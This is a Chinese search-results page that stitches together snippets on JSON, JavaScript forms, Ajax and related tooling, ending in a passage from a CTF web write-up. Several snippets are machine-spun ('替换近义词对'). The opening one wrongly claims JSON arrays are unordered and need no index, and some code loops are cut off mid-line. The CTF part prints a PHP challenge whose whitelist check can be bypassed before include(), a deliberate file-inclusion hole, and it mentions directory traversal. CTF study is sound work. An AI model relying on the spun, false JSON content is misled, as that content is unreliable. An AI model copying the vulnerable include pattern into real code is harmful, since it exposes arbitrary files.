[JSON数组与JavaScript原生数...]的搜索结果

JSON是一种依据字符串的简洁信息传输格式，它具有清晰可读简便易记、容易理解和兼容多种编程语言等优点。在JSON中，我们可以采用JSON列表来记录一连串数据项。区别于常规的数组，JSON列表是一个非有序集合，即数组中的每个元素并不需要给定一个索引位置，而是可以采用键值组合形式进行键值组合的记录。 { "fruits": [ {"name": "apple", "color": "red", "shape": "round"}, {"name": "banana", "color": "yellow", "shape": "long"}, {"name": "orange", "color": "orange", "shape": "round"}, {"name": "grape", "color": "purple", "shape": "round"} ] } 在上面的JSON数据中，"fruits"是一个含有四个对象的JSON列表，每个对象都有相应的"name"、"color"、"shape"字段值。在实际采用JSON时，可以采用for-in循环来遍历这样的JSON列表，取得其中的键值组合信息。 var data = JSON.parse('{"fruits":[{"name":"apple","color":"red","shape":"round"},{"name":"banana","color":"yellow","shape":"long"},{"name":"orange","color":"orange","shape":"round"},{"name":"grape","color":"purple","shape":"round"}]}'); for(var i in data.fruits) { console.log("Name: " + data.fruits[i].name + ", Color: " + data.fruits[i].color + ", Shape: " + data.fruits[i].shape); } 上面的JavaScript代码演示了如何解读JSON数据，并采用for-in循环遍历取得数组中的每个对象及其字段值。最终显示的结果为： Name: apple, Color: red, Shape: round Name: banana, Color: yellow, Shape: long Name: orange, Color: orange, Shape: round Name: grape, Color: purple, Shape: round 因此，JSON的非有序集合的特性使得其在处理多个键值组合数据时非常方便，同时也增强了其灵活性。

...建工具，它利用浏览器原生的 ES 模块导入功能实现快速热更新和按需编译，显著提升了开发者的工作效率。在本文中，作者使用 Vite 配合 Vue3 和 TypeScript 进行项目搭建，并通过引入相应的插件支持 tsx 语法糖。 TailwindCSS , TailwindCSS 是一种实用的原子化 CSS 框架，采用实用类名（utility-first）的方法为开发者提供了一系列预设的样式类，可快速应用于 HTML 元素以实现响应式布局、间距调整、颜色定制等常见样式需求。在该文章中，作者推荐了 TailwindCSS 用于后台管理系统项目的样式构建，以降低编写 CSS 样式的复杂度，提高开发效率。 Pinia , Pinia 是专为 Vue3 设计的状态管理库，用于在大型或复杂应用中管理和共享组件之间的状态数据。相较于 Vuex，Pinia 在设计上更加简洁易用，提供了灵活且强大的状态管理解决方案。在模板项目中，作者集成了 Pinia 来帮助团队成员更好地组织和维护应用中的全局状态与逻辑。 Jest , Jest 是一个流行的 JavaScript 测试框架，具有丰富的断言库和模拟功能，能够支持单元测试、集成测试等多种测试场景。在文中，作者配置了 Jest 作为项目的单元测试工具，确保代码质量与稳定性，通过编写测试用例来验证代码逻辑的正确性以及预期功能的实现。 Eslint 和 Prettier , Eslint 是一款静态代码检查工具，用于识别并报告 JavaScript 和 TypeScript 代码中的潜在错误、不一致性和不良编码习惯；Prettier 则是一款代码格式化工具，可以自动按照一套统一的规则格式化代码，确保团队间的代码风格一致性。在这篇文章中，作者介绍了如何结合 Eslint 和 Prettier 设置项目规范，以提升代码质量和团队协作效率。

...实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。 B站视频网址：（本次仅涉及P40-P43和P60）【优极限】 HTML+CSS+JavaScript+jQuery前端必学教程，小白教学，前端基础全套完成版_哔哩哔哩_bilibili 菜鸟教程网址：HTML 教程 | 菜鸟教程 (runoob.com) 一、获取表单 <!-- 获取表单(前两种常用)1. document.getElementById("id属性值");通过form标签的id属性值获取表单对象2.document.表单的nane属性值:通过表单的name属性值获取表单对象3.document.forms[下标]: 通过指定下标获取表单元素4.document.forms[表单的name属性值];通过表单的name属性值获取表单对象document.forms:获取HTML文档中所有的表单对象--> <form id="myform1" name= "myform1" action=""></form><form id="myform2" name= "myform2" action=""></form><script type="text/javascript">// 1. document.getElementById("id属性值");console.log(document.getElementById("myform1"));// 2. document.表单的name属性值; console.log(document.myform2);console.log("----------------");//获取所有的表单对象console.log(document.forms); // 3. document.forms[下标];console.log(document.forms[0]);// 4. document.forms[表单的name属性值]; console.log(document.forms["myform2"]);</script> 运行效果截图： 二、获取表单元素 获取表单元素1.获取input元素1. document.getElementById("id属性值"): 通过元素的id属性值获取表单元素对象2.表单对象.表单元素的name属性值;通过表单对象中对应的元素的name属性值获取3. document.getELementsByName("name属性值");通过表单元素的name属性值获取4. document.getELementsByTagName("标签名/元素名");通过标签名获取表单元素对象2.获取单选按钮注:相同的一组单选按钮，需要设置相同的name属性值1. document.getElementByName("name属性值");通过name属性值获取2.判断单选按钮是否选中checked选中状态在JS代码中checked=true表示选中checked=false表示不选中在HTML标签中checked=checked或checked表示选中不设置checked属性表示不选中3.获取单选按钮的值元表.value;3.获取多选按钮与单选按钮相同4.获取下拉选项1.获取下拉框对象var对象 = document.getElementById("id属性值");2.获取下拉框的下拉选项列表var options = 下拉框对象.options;3.获取下拉框被选中项的索引var index = 下拉框对象.selectedIndex;4.获取下拉框被选中项的值var 值 = 下拉框对象.value;5.通过选中项的下标获取下拉框被选中项的值var 值 = 下拉框对象.options[index].value;6.获取下拉框被选中项的文本var文本值一下拉框对象.options[index].text;注:1.获取下拉框选中项的值时: (value)如果option标签设置了value属性值，则获取value属性对应的值;如果option标签未设置value属性值，则获取的是option双标签中的文本值2.下拉框的选中状态:选中状态: selected = selected、 selected、 selected = true未选中状态:不设置selected属性、 selected=false; <form id='myform' name="myform" action="" method="get">姓名:<input type="text" id="uname" name="uname" value="zs"/><br />密码:<input type= "password" id="upwd" name="upwd" value= "1234"/><br /><input type="hidden" id= "uno" name="uno" value="隐藏域"/>个人说明:<textarea name="intro" ></textarea><br><button type="button" onclick="getTxt();" >获取元素内容</button><hr><br><input type="text" name="inputName" class="test" value="aaa" /><input type="radio" name="rad" class="test" value="1" /> 男<input type="radio" name="rad" class="test" value="2" /> 女<button type="button" onclick="getRadio()">获取单选按钮</button><br><hr><br>全选/全不选: <input type="checkbox" id="control" onclick="checkAllOrNot()" /><button type="button" onclick= "checkFan()">反选</button><br><input type="checkbox" name= "hobby" value="sing" />唱歌<input type="checkbox" name= "hobby" value="dance" />跳舞<input type="checkbox" name= "hobby" value="rap" />说唱<button type="button" onclick="getCheckBox()">获取多选按钮</button><br><hr><br>来自:<select id="ufrom" name= "ufrom" ><option value = "" >请选择</option><option value = "Beijing" selected="selected" >北京</option><option value = "Shanghai">上海</option><option value = "Hangzhou">杭州</option></select><button type="button" onclick= "getSelect()" >获取下拉选项</button></form><script type=" text/javascript">function getTxt() {// 1. document.getElementById("id属性值");var uname = document.getElementById("uname").value;console.log(uname);// 2.表单对象.表单元表的name属性值;var pwd = document.getElementById("myform").upwd.value;console.log(pwd);// 3. document.getELementsByName("name属性值");var uno = document.getElementsByName("uno")[0].value;console.log(uno);// 4. document.getELementsByTagName("标签名/元素名");var intro = document.getElementsByTagName("textarea")[0].value;console.log(intro);}function getSelect() {//获取下拉框对象var ufrom = document.getElementById("ufrom");console.log(ufrom);//获取下拉框的下拉选项列表var opts = ufrom.options;console.log(opts);//获取下拉框被选中项的索引var index = ufrom.selectedIndex;console.log("选中项的下标:" + index);//获取下拉框被选中项的值var val = ufrom.value;console.log("被选中项的值：" + val);//通过选中项的下标获取下拉框被选中项的值var val2 = ufrom.options[index].value;console.log("被选中项的值:"+ val2);//获取下拉框被选中项的文本var txt=ufrom.options[index].text; console.log("被选中项的文本:"+ txt);}</script> 运行效果截图： 三、提交表单 提交表单一、使用普通按钮type="button"1.给按钮绑定click点击事件，绑定函数2.在函数中，进行表单校验(非空校验、 合法性校验等)3.如果校验通过，则手动提交表单表单对象.submit();二、使用提交按钮type="submit"1.给按钮绑定click点击事件，绑定函数2.函数需要有返回值，返回true或false (如果return false, 则表单不会提交:如果return true，则提交表单）onclick="return 函数名()"3.在函数中，进行表单校验(非空校验、 合法性校验等)4.如果校验通过，返回true;如果校验不通过，则返回false, 则表单不会提交:如果return true，则提交表单）三、使用提交按钮type="submit"1.给表单form元素绑定submit提交事件，绑定函数2.函数需要有返回值，返回true或false (如果return false, 则表单不会提交;如果return trueonsubmit="return函数名()" 3.在函数中，进行表单校验(非空校验、 合法性校验等)4.如果校验通过，返回true;如果校验不通过，则返回false <!--使用普逍按钮 type= "button"--><form id= 'myform' name= "myform" action="http://www.baidu.com" method="get" >姓名: <input name= "uname" id="uname"/>  <span id = "msg" style="font-s1ze: 12px; color: red;"></span><br /><button type="button" onclick="submitForm1()">提交</button></form><!--使用提交按钮 type= "submit"--><form id= 'myform2' name= "myform2" action="http://www.baidu.com" method="get" >姓名: <input name= "uname2" id="uname2"/>  <span id = "msg2" style="font-s1ze: 12px; color: red;"></span><br /><button type="submit" onclick="return submitForm2()">提交</button></form><!--使用提交按钮 type= "submit"--><form id= 'myform3' name= "myform3" action="http://www.baidu.com" method="get" onsubmit="return submitForm3()">姓名: <input name= "uname3" id="uname3"/>  <span id = "msg3" style="font-s1ze: 12px; color: red;"></span><br /><button type="submit">提交</button></form><script type="text/javascript">// 表单校验// 提交表单function submitForm1() {//得到文本框的值var uname = document.getElementById("uname").value;//判断是否为空if (isEmpty(uname)) { //为空//设置提示信息(设置span元素的值)document.getElementById("msg").innerHTML="性名不能为空!" ;//阻止表单提交return;}//手动提交表单document.getElementById("myform").submit(); }function submitForm2() {//得到文本框的值var uname2 = document.getElementById("uname2").value;//判断是否为空if (isEmpty(uname2)) { //为空//设置提示信息(设置span元素的值)document.getElementById("msg2").innerHTML="性名不能为空!" ;//阻止表单提交return false;}return true;}function submitForm3() {//得到文本框的值var uname3 = document.getElementById("uname3").value;//判断是否为空if (isEmpty(uname3)) { //为空//设置提示信息(设置span元素的值)document.getElementById("msg3").innerHTML="性名不能为空!" ;//阻止表单提交return false;}return true;}/ 判断字符串是否为空如果为空，返回true如果非空，返回falsetrim() :字符串方法， 去除字符串前后空格@param {Object} str/function isEmpty(str) {//判断是否为空if (str == null || str.trim() == "") {return true;}return false;}</script> 运行效果截图： 四、原生Ajax实现流程 <!-- Ajax 异步无刷新技术原生Ajax的实现流程1.得到XMLHttpRequest对象var xhr = new XMLHttpRequest();2.打开请求xhr.open(method, uri, async) ;method:请求方式，通常是GEI|POSTurl:请求地址async:是否异步。如果是true表示异步，false表示同步3.发送请求xhr.send(params);params:请求时需要传递的参数如果是GET请求，设置nu11。 (GET请求的参数设置在url后面)如果是POST请求，无参数设置为null，有参数则设置参数4.接收响应xhr.status响应状态(200=响应成功， 404=资源末找到，500=服务器异常)xhr.responseText 得到响应结果 --> <script type="text/javascript">// 同步请求function text01() {// 1.得到XMLHttpRequest对象var xhr = new XMLHttpRequest();// 2.打开请求xhr.open("get", "js/date.json", false);// 3.发送请求xhr.send(null);// 4.判断响应状态if (xhr.status == 200) {console.log("响应成功");} else {console.log("状态码：" + xhr.status + "，原因：" + xhr.responseText)}console.log("同步请求...");}text01();// 异步请求function text02() {// 1.得到XMLHttpRequest对象var xhr = new XMLHttpRequest();// 2.打开请求xhr.open("get", "js/date.json", true);// 3.发送请求xhr.send(null);// 由于是异步请求，所以需要知道后台已经将请求处理完毕，才能获取响应结果// 遇过监听readyState的变化来得知后面的处理状态 4=完全处理xhr.onreadystatechange = function(){if(xhr.readyState == 4){// 4.判断响应状态if (xhr.status == 200) {// 得到响应结果 console.log(xhr.responseText);} else {console.log("状态码：" + xhr.status + "，原因：" + xhr.responseText)} }}console.log("异步请求...");}text02();</script> 运行效果截图： 本篇文章为转载内容。原文链接：https://blog.csdn.net/m0_61507413/article/details/122895643。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...创建对应的监控项。 JSON格式输出 , JSON（JavaScript Object Notation）是一种轻量级的数据交换格式，易于人阅读和编写，也易于机器解析和生成。在本文提到的场景中，通过编写shell脚本discovery_process.sh，将netstat命令查询到的所有运行服务进程的端口信息转换成JSON格式数据输出。这样做的好处是，Zabbix可以方便地解析这种结构化数据，根据JSON对象中的键值关系来创建和关联相应的监控项，进而实现实时监控每台服务器上不同服务进程的端口状态。

...效率和代码可读性。 JSON , JSON（JavaScript Object Notation）是一种轻量级的数据交换格式，易于人阅读和编写，同时也易于机器解析和生成。在文中提到的Fastjson是一个Java语言编写的高性能功能完备的JSON库，它可以将Java对象转换成JSON字符串，也可以将JSON字符串反序列化成Java对象，广泛应用于Web服务与前后端数据交互、配置文件存储、日志记录等多种场景。 IPage , IPage是MybatisPlus中封装的分页对象，用来进行数据分页查询。它包含了当前页码、每页显示条数以及总记录数等信息。在执行SQL查询时，MybatisPlus会根据IPage对象的内容自动拼接SQL分页语句，从而实现了数据的高效分页加载，减轻了数据库压力并优化了应用程序性能。

JSON是一种小巧的资料交换格式，其扩展名为.json。 在开发过程中，我们经常将资料保存到JSON格式的文档内，并利用程序加载这些资料。 // 加载JSON文件例子 var fs = require('fs'); var data = fs.readFileSync('data.json'); var jsonData = JSON.parse(data); console.log(jsonData); 加载JSON文件时，必须利用fs（FS模块）模块的readFileSync方法，将文件路径传递作为参数，加载文件内容。接着我们利用JSON.parse方法，将文件内容转换为JavaScript对象。 在开发中，JSON文件是一种非常常用的资料保存方式。无论是保存一些配置信息，还是保存用户资料，JSON文件都可以胜任。由于JSON格式的资料比较简洁，网络传输成本较低，因此在前端开发中也大量利用JSON格式的资料进行接口交互。 总之，JSON扩展名为.json，是一种非常常用的资料保存方式，在前端开发中扮演着重要的角色。

...前的软件开发领域中，JSON作为广泛采用的数据交换格式，其高效性和易用性备受开发者青睐。除了文中提到的Java JSON Util库外，还有其他一些流行的JSON处理工具值得关注和学习。 例如，Jackson是另一个在Java生态中广泛应用的高性能JSON处理器，它不仅提供了快速序列化与反序列化的能力，还支持注解驱动的API，使得JSON与Java对象之间的转换更为灵活、直观。另外，Gson也是Google推出的一款强大、灵活的JSON解析库，它可以将Java对象直接转换为JSON字符串，并能轻松实现反向操作，特别适合处理复杂的、嵌套的JSON数据结构。 对于.NET开发者而言， Newtonsoft.Json（也称为Json.NET）是一个强大的JSON框架，具备丰富的功能和出色的性能，已经成为.NET生态系统中不可或缺的一部分。 与此同时，随着Node.js和前端技术的发展，JavaScript原生对JSON的支持以及诸如axios、fetch等HTTP库对JSON数据的便捷处理方式也逐渐成为现代Web开发的标准实践。 值得注意的是，随着JSON Web Tokens (JWT) 在身份验证领域的普及，理解和熟练运用JSON相关的工具和技术愈发关键。开发者需要持续关注JSON标准的发展动态以及相关库的更新情况，以便在项目中选择最适合自己的JSON处理方案，进一步提升开发效率和应用性能。

JSON , JSON（JavaScript Object Notation）是一种轻量级的数据交换格式，它基于易于阅读和编写的人类可读文本，同时也易于机器解析和生成。在Web应用、API接口开发以及数据传输等领域广泛应用。其结构以键值对形式存在，可以表示简单的数据类型如字符串、数字、布尔值，也可以嵌套表示复杂的数据结构如数组和对象。 结构体（在Go语言中） , 在Go编程语言中，结构体是一种自定义复合数据类型，允许开发者组合多个不同类型的字段来创建新的数据类型。结构体成员可以是任何基本类型或自定义类型，甚至可以包含其他结构体作为其字段，形成嵌套结构。在处理JSON数据时，Go语言的结构体被用来映射JSON对象的结构，通过为结构体字段添加json标签，可以实现JSON数据与结构体字段之间的序列化和反序列化操作。 序列化与反序列化 , 序列化是将数据结构或对象转换为可以进行持久化存储或网络传输的形式（通常为字节流）的过程。在Go语言处理JSON时，结构体的序列化是指将结构体实例转化为JSON字符串；而反序列化则是相反的过程，即将JSON字符串解码恢复成相应的结构体实例。Go语言内置的encoding/json包提供了对JSON数据进行序列化和反序列化的支持，使得程序能够方便地与JSON格式的数据进行交互。

...客户端。 此外，随着JSON Web Tokens (JWT) 的广泛应用，请求头中的Authorization常用于传递经过签名的JSON令牌，实现无状态、安全的身份验证。而Accept头部则用来指示服务器返回数据的格式，如本文所展示的"application/json; charset=utf-8"，确保客户端能正确解析响应内容。 最近，Fetch API逐渐替代传统的XMLHttpRequest成为前端异步通信的新标准。在使用Fetch时，设置请求头的方式略有不同，但原理相似，例如： javascript fetch(base_path + 'aa/getList', { method: 'GET', headers: new Headers({ 'Accept': 'application/json; charset=utf-8', 'Authorization': 'Bearer ' + jwtToken }) }) .then(response => response.json()) .catch(error => console.error('Error:', error)); 因此，无论是jQuery的$.ajax还是原生Fetch API，对请求头的精准控制都是提升应用性能、保证数据安全、优化用户体验的重要手段。随着HTTP/2和HTTP/3协议的推广，未来可能还会出现更多针对请求头的优化策略和技术实践，值得广大开发者关注和学习。

替换近义词对：JSON是一种轻量级的数据传输格式，广泛应用于Web开发中的数据传输。它采用键值对的形式进行数据表达，而其中的数组则是一种特殊的数据组织方式，可以在解读和传输大规模数据时起到很好的作用。 替换近义词对：JSON数组是一种排列的项目集，其中每个项目可以是任何类型的数据，同样也可以是对象或者内含的其他数组。数组的描述采用中括号环绕，每个成员之间采用逗号间隔。 [ "apple", "banana", "orange", { "name": "Tom", "age": 30, "sex": "male" }, [1, 2, 3] ] 替换近义词对：在JavaScript中，通常采用JSON.parse()方法对JSON数据进行解读。JSON.parse()方法将JSON文本串转化为JS对象，而其中包括了JSON数组。我们可以利用for循环或者forEach等方法逐一访问JSON数组中的每个成员。 var jsonStr = '["apple","banana","orange",{"name":"Tom","age":30,"sex":"male"},[1,2,3]]'; var jsonArray = JSON.parse(jsonStr); for (var i=0; i 在逐一访问JSON数组时，需要注意一些要点。如果项目是对象或者内含的数组，我们需要重复使用for循环或者相应的方法逐一访问其中的子项目。如果项目是基本类型，直接作为普通的变量采用即可。 var jsonArray = ['apple','banana','orange',{name:'Tom',age:30,sex:'male'},[1,2,3]]; for (var i=0; i 总结：JSON数组作为JSON数据格式的重要组成部分，在Web开发中具有十分广泛的应用。我们可以采用JSON.parse()方法对JSON数据进行解读，并采用for循环或者其他方法逐一访问其中的每个成员。

JSON（JavaScript对象表示法）是一种简洁的数据传递格式，用于以文本形式保存和传递数据。JSON以键值对映射的形式构建数据，兼容多种变量类型，例如文本、数值、逻辑值和列表等。 在Python中，我们可以使用json模块来读取JSON数据。json模块拥有loads()方法，可以将JSON对象变为Python中的关联数组（dictionary）或列表（list）。 import json JSON对象 json_str = '[1, 2, 3, 4, 5]' 将JSON对象变为列表 json_list = json.loads(json_str) print(json_list) [1, 2, 3, 4, 5] 在上面的代码中，我们首先导入了json模块。然后，我们声明了一个含有JSON对象的文本。最后，我们使用loads()方法将JSON对象变为Python列表。 如果JSON对象含有了多个字段和值，我们可以将JSON对象变为Python关联数组。 import json JSON对象 json_str = '{"name": "Tom", "age": 18, "gender": "male"}' 将JSON对象变为关联数组 json_dict = json.loads(json_str) print(json_dict) {'name': 'Tom', 'age': 18, 'gender': 'male'} 在上面的代码中，我们声明了一个含有多个字段和值的JSON对象。然后，我们使用loads()方法将JSON对象变为Python关联数组。 总的来说，将JSON变为Python中的列表或关联数组非常简单，只需要使用json模块中的loads()方法即可。

JSON , JavaScript Object Notation，是一种轻量级的数据交换格式。它基于纯文本，采用完全独立于语言的文本格式来存储和表示数据，易于人阅读和编写，同时也易于机器解析和生成。在Java中处理JSON时，通常用于在网络请求、API接口调用等场景下传输和交换数据，其结构包括键值对、数组和嵌套对象等多种形式。 ObjectMapper , 在Jackson库中，ObjectMapper是一个核心类，主要用于实现JSON与Java对象之间的相互转换。它可以将Java对象序列化为JSON字符串，也可以将JSON字符串反序列化为各种Java类型，如基本类型、List、Set、Map以及自定义Java Bean等。在本文的具体情境中，ObjectMapper通过readValue方法将JSON字符串转换成一个Map对象。 TypeReference , 这是Jackson库中的一个泛型类，用于在运行时捕获并保存泛型类型信息。由于Java的类型擦除机制，无法直接获取到参数化类型的Class对象，而TypeReference则提供了一种方式绕过这个问题，在JSON反序列化过程中，能够精确地指定目标类型，从而帮助ObjectMapper准确地将JSON内容转换为具有复杂泛型结构的Java对象，如Map<String, Object>或其他嵌套类型的集合。在文章示例代码中，TypeReference用于指示将JSON字符串转换为Map类型。

JSON , JavaScript Object Notation，是一种轻量级的数据交换格式，它基于文本，采用完全独立于语言的简洁语法设计，易于人阅读和编写，同时也易于机器解析和生成。在Web开发中广泛应用于服务器与客户端之间的数据传输，能够存储和表示简单值、数组、对象等多种类型的数据结构，并且可以支持嵌套，便于构建复杂的数据模型。 易语言 , 是一款国产的编程语言及其集成开发环境，具有全可视化编程、跨平台、面向对象等特点，旨在降低编程门槛，提高开发效率。易语言支持丰富的API接口调用和模块导入，使得开发者能够轻松实现各种功能，包括处理JSON数据等高级应用。 JSON模块 , 在易语言环境中，JSON模块是一个专门用于处理JSON数据的内置或第三方库，提供了将JSON字符串解析为易语言可操作的对象（如字典或数组）以及将易语言数据结构转换为JSON字符串的功能。通过调用JSON模块的相关函数，开发者能够便捷地读取、解析、创建和修改JSON数据，以满足Web开发中的数据交换需求。 文件操作模块 , 在易语言编程中，文件操作模块是一组预定义的功能组件，用于执行与文件相关的各种操作，例如打开文件、读取文件内容、写入文件、关闭文件等。结合JSON模块，文件操作模块可用于从JSON文件中读取数据，实现数据持久化存储和加载，进一步增强了易语言对JSON数据流处理的能力。

在近几年的研制中，JSON（JavaScript Object Notation）已经逐步变为信息传递和串行化的首选项格式。相较于XML（Extensible Markup Language），JSON更加简洁、容易查看和创建，因此越来越多的人觉得JSON能够替代XML。 // JSON 示例 { "name": "小明", "age": 18, "gender": "男" } // XML 示例 <person> <name>小明</name> <age>18</age> <gender>男</gender> </person> 相比之下，JSON的句法更加简易明了，不需要像XML那样需要标签和属性来表示数据的结构。JSON中的数据可以直接嵌套在另一个数据中，这使得JSON更加容易查看和处理。 JSON还具有比XML更快的解析速度和更小的体积，这使得它在移动端和网络传输等场景中更加适用。此外，JSON是JavaScript的一种原生格式，这也意味着在前端研制中，我们能够直接将JSON对象转换为JavaScript对象，因此能够更加方便的处理和使用数据。 当然，XML也有自己的优势，比如支持命名空间、容错性更高等等。但是，随着JSON在越来越多的场景中替代XML，我们有理由相信JSON会变为未来的主流信息传递和串行化格式。

...传文件临时路径信息的数组变量。当用户通过选择文件或拍照等方式上传图片后，调用相关接口（如uni.uploadFile）成功返回的结果中会包含此属性。tempFilePaths 数组中的每个元素代表一个临时文件的路径，这些临时文件通常仅在一定时间内有效，可用于后续的预览、上传至服务器等操作。 TypeError , 在JavaScript编程中，TypeError是一种标准内置错误类型，表示由于变量类型不匹配或者无效的操作导致的错误。在uni-app图片上传问题的场景下，出现“TypeError: e.split is not a function”错误提示意味着开发者试图对非字符串类型的对象执行split方法，而split是专门用于字符串处理的方法，无法应用于非字符串类型的变量（在这里是数组res.tempFilePaths）。因此，该错误提示表明了代码逻辑存在类型判断和处理上的问题，需要调整以适应实际的数据类型。

在深入理解了JavaScript中XMLHttpRequest对象如何实现HTTP GET和POST请求后，我们可以进一步探索现代Web开发中的相关技术发展与实践。近年来，随着Fetch API的普及，它作为XMLHttpRequest的一个替代方案，提供了更简洁、强大的异步数据获取方式。Fetch API支持Promise规范，使得异步操作链式调用更为简便，并且内置了对Response对象的便捷处理方法，可以直接转换或读取JSON数据。 另外，在安全性方面，现代Web应用程序越来越注重数据传输的安全性。除了使用POST方法提交敏感信息外，HTTPS加密协议已成为网站标配，确保所有通信内容（包括GET请求）都被加密，防止中间人攻击。同时，为应对跨站请求伪造（CSRF）等安全威胁，开发者还需借助如CSRF token等机制增强防护。 此外，针对前后端交互模式的演进，RESTful API设计原则被广泛采纳，强调资源的表述性状态转移，使得API设计更加直观和易于维护。而随着前端框架如React、Vue.js等的发展，通过axios、fetch等库进行HTTP请求的操作变得更加方便，这些库通常封装了底层 XMLHttpRequest 或 Fetch API，提供了一致且易用的接口。 总的来说，从基础的XMLHttpRequest到如今丰富的前端工具链与安全策略，Web开发领域不断涌现出新的解决方案以优化HTTP请求的处理方式及提高数据传输安全性。因此，持续关注并掌握最新的网络请求技术和最佳实践对于现代Web开发者至关重要。

...回避的问题。在咱们做JavaScript和Web开发这行，由于一些陈年旧账和技术的迭代更新，浏览器之间的兼容性问题时不时就会冒个泡。所以啊，老铁们，确保字符串都以UTF-8这种格式编码，那可是相当关键的一环，可马虎不得！尤其是当你在URL查询参数、Ajax请求内容或JSON数据序列化过程中遇到包含中文字符的字符串时，不恰当的编码可能会导致乱码或数据丢失。本文将带你通过生动具体的示例，揭示如何运用jQuery巧妙地实现中文字符到UTF-8编码的转换。 2. 理解基础 字符编码与Unicode 首先，让我们对“字符编码”这个概念有个基本的认识。在计算机世界里，每个字符都有对应的数字编码，比如ASCII码对于英文字符，而Unicode则是一个包含了全球所有语言字符的统一编码方案。UTF-8是一种变长的Unicode编码方式，它能高效地表示各种语言的字符，特别是对于中文这种非拉丁字符集尤为适用。 3. jQuery不是万能钥匙 JavaScript原生方法 尽管jQuery提供了丰富的DOM操作接口，但在处理字符串编码问题上，并没有直接提供特定的方法。实际上，我们通常会借助JavaScript的内置函数来完成这一任务。这是因为，在JavaScript的大脑里，它其实早就把字符串用UTF-16编码（这货也是Unicode家族的一员）给存起来了。所以，在我们捣鼓JS的时候，更关心的是怎么把这些字符串巧妙地变身成UTF-8格式，这样一来它们就能在网络世界里畅行无阻啦。 javascript // 假设有一个包含中文的字符串 var chineseString = "你好，世界！"; // 转换为UTF-8编码的字节数组 // 注意：在现代浏览器环境下，无需手动转码，此步骤仅作演示 var utf8Bytes = unescape(encodeURIComponent(chineseString)).split('').map(function(c) { return c.charCodeAt(0).toString(16); }); console.log(utf8Bytes); // 输出UTF-8编码后的字节表示 上述代码中，encodeURIComponent 方法用于将字符串中的特殊及非ASCII字符转换为适合放在URL中的形式，其实质上就是进行了UTF-8编码。然后使用 unescape 反解这个过程，得到一个已经在内存中以UTF-8编码的字符串。最后将其转化为字节数组并输出十六进制表示。 4. 实战应用场景 Ajax请求与JSON.stringify() 在实际的jQuery应用中，如发送Ajax请求： javascript $.ajax({ url: '/api/some-endpoint', type: 'POST', contentType: 'application/json; charset=UTF-8', // 设置请求头表明数据格式及编码 data: JSON.stringify({ message: chineseString }), // 自动处理中文编码 success: function(response) { console.log('Data sent and received successfully!'); } }); 在这个例子中，jQuery的$.ajax方法配合JSON.stringify将包含中文字符的对象自动转换为UTF-8编码的JSON字符串，服务器端接收到的数据能够正确解码还原。 5. 总结与思考 虽然jQuery本身并未直接提供中文转UTF-8编码的API，但通过理解和熟练运用JavaScript的内建方法，我们依然可以轻松应对这类问题。尤其在处理跨语言、跨平台的数据交换时，确保字符编码的一致性和正确性至关重要。在实际动手操作的项目里，除了得把编码转换搞定，还千万不能忘了给HTTP请求头穿上“马甲”，明确告诉服务器咱们数据是啥样的编码格式，这样才能确保信息传递时一路绿灯，准确无误。下一次当你在jQuery项目中遇到中文编码难题时，希望这篇文章能成为你的得力助手，帮你拨开迷雾，顺利解决问题。记住，编码问题虽小，但关乎用户体验，不容忽视。

随着JavaScript语言的不断发展，Babel作为ES6+语法向旧版环境兼容的关键工具，在前端工程化领域扮演着至关重要的角色。最近，Babel团队在持续更新和优化其核心功能的同时，也在积极探索新的特性支持和性能提升。 今年早些时候，Babel 7.14版本发布，引入了对ECMAScript 2021新特性的支持，如顶级Await表达式、Logical Assignment Operators等，并进一步优化了@babel/preset-env预设的行为，允许开发者更精细地控制转换目标与兼容范围。同时，为了更好地配合现代模块打包工具，例如Webpack 5和Rollup，Babel开始加强对Tree Shaking的支持，使得代码体积得到更有效的压缩。 此外，Babel社区也积极推动生态建设，不断涌现出新的插件以支持最新的提案或特定场景需求，如@babel/plugin-proposal-logical-assignment-operators处理逻辑赋值运算符，以及@babel/plugin-syntax-top-level-await实现顶层await操作的支持。 值得关注的是，针对遗留项目和渐进式升级的需求，Babel官方文档提供了详尽的迁移指南和常见问题解答，帮助开发者从Babel 6平滑过渡至Babel 7，确保项目的稳定性和兼容性。 综上所述，无论是在跟进最新标准还是优化项目构建流程方面，Babel都在与时俱进并保持活跃发展。对于广大前端开发者而言，深入理解和熟练运用Babel的各项配置与最佳实践，无疑将极大地提升开发效率和代码质量。建议密切关注Babel的官方博客和技术论坛，及时掌握最新动态和技术趋势，以应对日新月异的前端开发挑战。

...实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。 目录 [HCTF 2018]WarmUp [强网杯 2019]随便注 [SUCTF 2019]EasySQL [GYCTF2020]Blacklist [GKCTF2020]cve版签到 GXYCTF2019禁止套娃 [De1CTF 2019]SSRF Me [极客大挑战 2019]EasySQL [极客大挑战 2019]Havefun [极客大挑战 2019]Secret File [ACTF2020 新生赛]Include 2018]easy_tornado [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping [RoarCTF 2019]Easy Calc [极客大挑战 2019]Knife [ACTF2020 新生赛]Exec [极客大挑战 2019]PHP [极客大挑战 2019]Http [HCTF 2018]admin [极客大挑战 2019]BabySQL [HCTF 2018]WarmUp 这里补充一个知识点：phpmyadmin 4.8.1任意文件包含 环境我已经启动了 去访问一下 源码有提示 去访问一下 然后看到了源码 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 这里白名单里给了一个提示 尝试直接去访问它 报错了… 尝试穿越目录去访问 依然报错了 看源码吧 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = 